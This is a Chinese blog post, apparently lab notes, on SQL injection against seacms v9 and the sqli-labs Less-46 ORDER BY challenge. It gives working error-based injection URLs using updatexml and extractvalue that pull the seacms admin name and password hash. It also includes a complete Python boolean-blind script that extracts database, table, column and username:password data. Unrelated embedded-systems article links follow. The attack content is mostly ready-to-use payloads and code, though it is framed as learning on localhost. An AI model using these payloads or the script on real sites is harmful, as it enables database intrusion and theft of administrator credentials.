seacmsv9注入管理员账号密码+orderby+limit

最新推荐文章于 2026-03-24 00:47:46 发布
原创 最新推荐文章于 2026-03-24 00:47:46 发布 · 871 阅读 · 11 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#安全 #php

一、seacmsv9 SQL注入

1、seacms漏洞

海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,采用的是 php5.X+mysql 的架构,seacmsv9漏洞文件:./comment/api/index.php,漏洞参数:$rlist

2、漏洞绕过

了解到seacms是开源,可以知道seacmsv9系统数据库存放管理员账号的表为sea_admin,存放管理员姓名字段为name,存放密码字段为password

3、经过分析,使用一下注入语句:

http://127.0.0.1/seacmsv9/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@', updatexml (1,concat_ws(0x20,0x5c,(select name from%23%0asea_admin limit 0,1)),1), @'

 并没注入成功,无回显

接下来在数据库中测试

通过注入

输入:

SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=1 AND id in (@\', updatexml(1,concat_ws(0x20,0x5c,(select name from#sea_admin limit 0,1)),1), @\') ORDER BY id DESC;

没用通过报错报出管理员名字

然后改为database(),继续输入命令

SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=1 AND id in (@\', updatexml(1,concat_ws(0x20,0x5c,(select database()#)),1), @\') ORDER BY id DESC;

发现报错爆出数据库名字

查找原因发现sea_comment内为空,无法回显

同样我们再网页中进行报错注入

输入:

http://127.0.0.1/seacmsv9/upload/comment/api/index.php?gid=1&page=2&rlist[]=@%27,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20user()))),@%27

报错注入出数据库用户名

输入:

http://127.0.0.1/seacmsv9/upload/comment/api/index.php?gid=1&page=2&rlist[]=@%27,%20extractvalue(1,%20concat_ws(0x20,%200x5c,database())),@%27

报错注入数据库名

注入管理员账号密码同样也是无回显

原因也是sea_comment内为空,无法回显

原因:

①数据依赖性:updatexml函数的报错注入通常是通过构造恶意的XPath表达式,使其产生错误并泄露部分信息,如果注入点的逻辑要求从sea_comment表中读取数据以构建这个恶意的XPath表达式,那么当sea_comment为空时,就无法构造出有效的报错语句;

②只有当注入的数据被存储到这个表中时,才会在页面上看到结果。可能会尝试先向sea_comment表插入一条或多条测试数据,然后观察是否能触发期望的updatexml报错;

③插入两条数据到sea_comment表可能是为了创建必要的条件,以便后续能够成功实施XPath注入攻击。

④有几个潜在原因,触发特定逻辑、构造恶意XPath表达式、绕过安全机制、验证注入成功与否、数据关联性

需要插入数据

输入:

INSERT INTO sea_comment (uid, v_id, typeid, username, ip, ischeck, dtime, msg, m_type, reply, agree, anti, pic, vote)
    -> VALUES
    -> (1, 100, 1, 'user1', '192.168.1.1', 1, UNIX_TIMESTAMP(), 'This is a comment', 1, 0, 0, 0, 'image1.jpg', 10),
    -> (2, 101, 2, 'user2', '192.168.1.2', 1, UNIX_TIMESTAMP(), 'This is another comment', 2, 0, 0, 0, 'image2.jpg', 5);
然后再次报错注入,就发现可以注入出管理员账号密码

注入账号:

输入:

http://127.0.0.1/seacmsv9/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@', updatexml (1,concat_ws(0x20,0x5c,(select name from%23%0asea_admin limit 0,1)),1), @'

注入密码:

输入:

http://127.0.0.1/seacmsv9/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@', updatexml (1,concat_ws(0x20,0x5c,(select password from%23%0asea_admin limit 0,1)),1), @'

 最后再通过md5转换出密码

二、Order by

环境:sqlilabs-less-46关

1、sort传入id

2、sort传入username

 sort前面是order by,通过sort传入的字段排序

3、boolen盲注

用sort=if(表达式,id,username)的方式注入,通过BeautifulSoup爬取表格中username下一格的 值是否等于Dumb来判断表达式的真假,并使用二分查找加快注入速度,从而实现boolen(布尔) 注入,具体代码如下

import requests
from bs4 import BeautifulSoup
 
def get_username(resp):
    soup = BeautifulSoup(resp,'html.parser')
    username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
    return username
 
def inject_database_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://127.0.0.1/sqlilabs/Less-46/index.php?sort=if(ascii(substr(database(),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)
 
def inject_table_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://127.0.0.1/sqlilabs/Less-46/index.php?sort=if(ascii(substr((select group_concat(table_name) from \
                information_schema.tables where table_schema=database()),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)
 
def inject_column_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://127.0.0.1/sqlilabs/Less-46/index.php?sort=if(ascii(substr((select group_concat(column_name) from \
                information_schema.columns where table_schema=database() and table_name='users'),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)
 
def inject_data_boolen():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://127.0.0.1/sqlilabs/Less-46/index.php?sort=if(ascii(substr((select group_concat(username,':',password) \
                from users),{i},1))>{mid},id,username) -- "
            resp = requests.get(url)
            if 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
        print(tables)
 
if __name__ == '__main__':
    # inject_database_boolen()
    # inject_table_boolen()
    # inject_column_boolen()
    # inject_data_boolen()

Wacjey
关注
STM32嵌入式系统:将数据保存到SD卡的操作
CodeMaven的博客
09-06 2259
通过本文的步骤,你可以学习如何使用STM32单片机将采集到的数据保存到SD卡中。嵌入式系统在现代科技中扮演着重要角色,而STM32单片机是一种常用的嵌入式系统解决方案。本文将介绍如何使用STM32单片机将采集到的数据以TXT文件的格式保存到SD卡中,并且能够方便地读取这些本地数据。单片机将采集到的数据保存到名为"data.txt"的文件中。你可以使用电脑或移动设备读取SD卡上的数据文件,以验证数据是否正确保存。使用STM32CubeIDE构建代码,并将生成的可执行文件烧录到STM32开发板上。
STM32之完成对SD卡的数据写入
heitui__的博客
12-24 1174
实验步骤 链接:https://pan.baidu.com/s/1MFVI8M022kbmuOlGbAl6aw 提取码:xhc1 下载源程序 下载完成后打开 修改此处,否则会有乱码
STM32F4与OV2640摄像头实战:从零搭建图像采集系统(附完整代码)
最新发布
weixin_30872337的博客
03-24 93
本文详细介绍了如何从零搭建基于STM32F4和OV2640摄像头图像采集系统,涵盖硬件连接、DCMI接口配置、SCCB通信协议实现及图像处理优化等关键步骤。通过完整的代码示例和实战应用,帮助开发者快速掌握嵌入式视觉系统的开发技巧,特别适合需要高效图像采集的嵌入式项目。
基于STM32F103的OV7670摄像头驱动程序设计与优化
weixin_66608063的博客
01-10 5049
通过合理集成OV7670摄像头驱动、I2C通信、DMA数据传输和图像处理,我们可以实现一个高效且稳定的图像采集系统。通过配置DMA通道和缓冲区,我们可以将从摄像头读取到的图像数据直接传输到存储设备或显示设备上,减少了CPU的负担。在本文中,我们将介绍如何利用STM32F103微控制器和OV7670摄像头实现驱动程序,并提供相应的代码示例。例如,可以使用FAT文件系统将图像数据保存到SD卡上,或者使用显示设备的驱动程序将图像显示到LCD幕上。根据实际需求,我们可以编写相应的代码来处理和优化图像数据。
STM32——照相机
weixin_62584795的博客
10-27 2458
STM32——照相机
76、基于STM32单片机车牌识别摄像头图像处理扫描设计(程序+原理图+PCB源文件+相关资料+参考PPT+元器件清单等)
ENGLISH_HHZ的专栏
07-01 8620
STM32系列是为要求高性能、低成本、低功耗的嵌入式应用专门设计的ARM Cortex-M3内核。按性能分成两个不同的系列:“增强型”STM32F103系列和“基本型”STM32F101系列。增强型系列的时钟频率能达到72MHz,是同类产品中频率最高的;基本型的时钟频率为36MHz,用16位产品一样的价格得到比16位产品更大的性能,是16位产品的最好选择。两个系列都有内置的32K到128K的闪存,不同的是SRAM的最大容量和外设接口的组合。
【嵌入式裸机开发】基于stm32照相机(OV7670摄像头STM32TFTLCD)
海风的博客
02-26 7886
开机的时候先检测字库,然后检测SD卡根目录是否存在PHOTO文件夹,如果不存在则创建,如果创建失败,则报错(提示拍照功能不可用)。在找到SD卡的PHOTO文件夹后,开始初始化OV7670,在初始化成功之后,就一直在TFTLCD上显示OV7670拍到的内容。当上位机按下拍照时,进行拍照,此时DS1亮,照片通过串口发送至上位机,当DS1灭之后,拍照成功。(也可以自己改一改用板子的按键控制拍照)1,串口1(波特率:921600,PA9/PA10通过usb转ttl连接电脑,或者其他方法)上传图片数据至上位机。
学习笔记之STM32的ov7670摄像头实验
sincerelover的博客
08-02 1万+
OV7670是由OV(OmniVision)公司生产的一颗1/6寸的CMOS VGA图像传感器。该传感器体积小、工作电压低,提供单片VGA摄像头和影像处理器的所有功能。通过SCCB总线控制,可以输出整帧、子采样、取窗口等方式的各种分辨率8位影像数据。该产品VGA图像最高达到30帧/秒,用户可以完全控制图像质量、数据格式和传输方式。
83、基于STM32单片机录音机录音笔语音存储回放TF卡TFT系统设计(程序+原理图+PCB源文件+参考论文+硬件设计资料+元器件清单等)
ENGLISH_HHZ的专栏
07-04 2889
STM32系列是为要求高性能、低成本、低功耗的嵌入式应用专门设计的ARM Cortex-M3内核。按性能分成两个不同的系列:“增强型”STM32F103系列和“基本型”STM32F101系列。增强型系列的时钟频率能达到72MHz,是同类产品中频率最高的;基本型的时钟频率为36MHz,用16位产品一样的价格得到比16位产品更大的性能,是16位产品的最好选择。两个系列都有内置的32K到128K的闪存,不同的是SRAM的最大容量和外设接口的组合。
基于STM32单片机录音机录音笔语音存储回放TF卡TFT设计152
单片机设计开发
12-31 1028
基于STM32单片机智能录音机录音笔语音存储回放设计TF卡TFT彩屏显示/DIY件152。
154、基于STM32单片机摄像头可视倒车影像超声波报警TFT系统设计(程序+原理图+PCB源文件+参考论文+硬件设计资料+元器件清单等)
ENGLISH_HHZ的专栏
07-23 996
STM32系列是为要求高性能、低成本、低功耗的嵌入式应用专门设计的ARM Cortex-M3内核。按性能分成两个不同的系列:“增强型”STM32F103系列和“基本型”STM32F101系列。增强型系列的时钟频率能达到72MHz,是同类产品中频率最高的;基本型的时钟频率为36MHz,用16位产品一样的价格得到比16位产品更大的性能,是16位产品的最好选择。两个系列都有内置的32K到128K的闪存,不同的是SRAM的最大容量和外设接口的组合。
stm32(SCCB)+ov7670摄像头输出图像程序
qq_52590045的博客
06-08 5390
OV7670一般模块指低成本数字输出CMOS摄像头,其摄像头包含30w像素的CMOS图像感光芯片,3.6mm焦距的镜头和镜头座,板载CMOS芯片所需要的各种不同电源(电源要求详见芯片的数据文件),板子同时引出控制管脚和数据管脚,方便操作和使用。3V3-----输入电源电压(推荐使用3.3,5V也可,但不推荐)GDN-----接地点。
智能家居摄像头设计方案
RlDart的博客
09-21 1171
现今,智能家居逐渐成为生活的一部分,而智能家居摄像头则成为一个不可或缺的组成部分。本设计基于单片机,实现了智能家居摄像头的功能。使用OpenCV提供的函数将视频流捕获到单片机中,并对图像进行处理,如亮度调整、图像压缩等。本设计采用的是STM32F103C8T6,可兼容Arduino,同时具有丰富的外设资源。本设计采用的是通用型USB摄像头模块,通过USB接口与单片机进行连接。cap.isOpened()) //判断是否成功打开。if (frame.empty()) //判断是否获取到帧。
基于STM32、OV2640及ESP8266的无线图传
热门推荐
sssxlxwbwz的博客
04-30 2万+
一、简介: 本文利用STM32F407单片机、OV2640摄像机模块以及ESP8266 WIFI模块,并基于C#编写的TCP上位机服务,来实现图像的无线传输。 本文受启发于博客:ESP8266+STM32F407+OV7670实现图片传输,在此感谢该文作者。与该文不同的是,本文采用的摄像机模块是0V2640,传输的数据是压缩之后的jpeg格式的图像数据,而不是像上文博主那样,将RGB565数据直接传输到上位机。此外,本文存在和上文博主同样的问题,即采用串口传输方式,数据传...
嵌入式安防监控项目——实现真实数据的上传
qq_52479948的博客
03-16 5293
嵌入式安防监控项目——实现真实数据的上传
基于STM32单片机车牌识别系统摄像头图像处理蓝牙APP设计90
单片机设计开发
12-29 864
基于STM32单片机的车牌识别系统设计摄像头图像扫描处理TFT彩屏显示手机蓝牙APP上传设计设计/DIY设计90。
毕业设计 基于51单片机的无线视频监控系统设计
Nueve_Y的博客
11-07 1740
无线发射和接收电路运用C8051F310单片机的SPI串行外设接口进行电路的控制。在此主要介绍C8051F310单片机的内部性能[8]和SPI总线的特性。一、C8051F310内部性能1.模拟外设·10位ADC转换速率可达200ksps可多达21个外部单端或差分输入VREF可在外部引脚或VDD中选择内置温度传感器(±3°C)·两个模拟比较器可编程回差电压和响应时间可配置为中断或复位源(比较器0)2.在片调试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值